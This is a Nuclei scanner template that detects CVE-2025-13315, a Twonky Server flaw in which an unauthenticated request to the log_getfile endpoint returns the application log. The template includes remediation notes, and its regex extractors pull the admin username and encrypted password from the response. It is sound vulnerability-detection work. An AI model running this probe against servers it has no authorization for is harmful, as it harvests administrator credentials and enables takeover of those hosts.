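# Nuclei template: detects a Twonky Server instance that serves its
# application log to unauthenticated clients (CVE-2025-13315).
id: CVE-2025-13315

info:
  name: Twonky Server 8.5.2 - Unauthenticated Log File Leak (CVE-2025-13315)
  author: 0xBlackash
  severity: critical
  description: |
    An unauthenticated attacker can access /nmc/rpc/log_getfile and retrieve
    application logs containing the admin username and encrypted password.
  # NOTE(review): the Rapid7 reference URL below describes the issue as
  # "not fixed"; confirm the current vendor status before relying on this.
  remediation: |
    Restrict network access to the Twonky Server web/RPC interface to trusted
    hosts, and rotate the administrator password on any host where the log
    was reachable. Check the vendor for a release that addresses the issue.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13315
  classification:
    cve-id: CVE-2025-13315
  tags: cve,cve2025,twonky,log-leak,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"
      - "{{BaseURL}}/rpc/log_getfile"

    # Either path proves the exposure; stop after the first hit so a host is
    # reported once and the second request is not sent needlessly.
    stop-at-first-match: true

    # All matchers below must hold.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Match only on the credential keys the leaked log is expected to carry.
      # Entries inside one matcher are OR-ed unless `condition: and` is set, so
      # generic strings (a product name, "Media Server", or "||", which occurs
      # in almost any JavaScript) would flag unrelated 200 pages. Response size
      # and timing say nothing about the content and are not used as evidence.
      # NOTE(review): key names are taken from this template's extractors;
      # confirm them against a log sample from an affected server.
      - type: word
        part: body
        words:
          - "accessuser"
          - "accesspwd"
        condition: or
        case-insensitive: true

    # The extracted values are credential material (admin user name and the
    # encrypted password). They are written to the scan output, so results of
    # this template should be stored and shared as sensitive data.
    extractors:
      - type: regex
        name: username
        part: body
        regex:
          - '(?i)(?:accessuser|username|admin)\s*[:=]\s*([^\s\r\n]+)'

      - type: regex
        name: encrypted_password
        part: body
        regex:
          - '(?i)(?:accesspwd|password)\s*[:=]\s*([^\s\r\n]+)'

      - type: regex
        name: encrypted_hex
        part: body
        regex:
          - '\|\|([0-9a-fA-F]{16,})'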